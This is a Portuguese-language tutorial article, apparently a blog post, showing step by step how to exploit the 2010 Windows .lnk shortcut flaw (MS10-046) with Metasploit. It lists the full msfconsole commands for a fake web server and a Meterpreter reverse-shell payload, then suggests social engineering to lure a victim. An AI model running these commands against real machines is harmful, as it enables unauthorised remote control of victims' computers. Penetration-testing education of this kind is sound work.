Essa exploração baseia-se na falha existente no Windows, em todas as suas versões, no que diz respeito a manipulação de arquivos .lnk. Essa falha, assim como seu exploit tornaram-se públicos no final de na segunda quinzena de julho/2010.
O mais interessante, é que após tornar pública a falha, e consequentem ente o exploit, que surgiu um dia depois da divulgação da falha por parte da Microsoft, a correção da mesma só foi sair quase um mês depois, deixando milhões de máquinas vulneráveis a esse simples, mas devastador ataque.
Vamos lá...
# ./msfconsole
O primeiro comando seleciona o exploit que será usado:
> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Caso queiramos mais informações sobre o exploit e sua respectiva falha, podemos digitar o seguinte comando:
> info
Esse comando exibirá, além da informações sobre a falha, as opções que precisamos configurar para o correto funcionamento do exploit. As opções obrigatórias são: SRVHOST, SRVPORT
Vamos configurá-las:
> set SRVHOST 192.168.0.83
Esse último comando, permitirá configurarmos o IP no qual o servidor web falso será montado para que a vítima acesso-o. No comando abaixo, vamos configurar a porta na qual o servidor ficará escutando, à espera de uma conexão:
> set SRVPORT 80
Havendo configurado a parte básica do exploit, precisamos configurar o que ele fará após explorar a falha no navegador da vítima, isso é, o payload:
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.0.83
> set LPORT 4444
Tudo configurado, funcionando bem, sem nenhum erro, simplesmente lançamos o exploit e aguardamos a vítima conectar em nosso servidor falso:
> exploit
Para conseguirmos que a vítima conecte, nada como um bom e velho ataque de engenharia social :-)
De forma mais ilustrativa, vocês podem assistir ao vídeo que gravei para minha apresentação da palestra sobre "Ferramentas Livres para Teste de Invasão", que ocorrei na 11ª edição do FISL, em julho/2010. O mais legal é que apresentei a falha no dia seguinte em que a mesma foi publicada, por isso verão que no vídeo o nome do exploit ainda não possui o nome final, que o que está no texto, por isso, sigam o que está no artigo:
Metasploit com Microsoft Word Ataque USB U3 com Metasploit Como e porque encobrir rastros ao final de um teste de invasão? Forense Computacional - Conceitos Iniciais - Parte 2 Teste de invasão (parte 1) - Identificação de banner XLSInjector - Saiba como injetar um Shell Meterpreter em arquivos Excel SleuthKit & Autopsy - *BSD, Unix, Linux Forensic tools Funcionalidades pouco conhecidas ou usadas do Netcat Segurança nos terminais Ataque USB U3 com Metasploit
Versão para impressora
Indicar para um amigo
Enviar artigo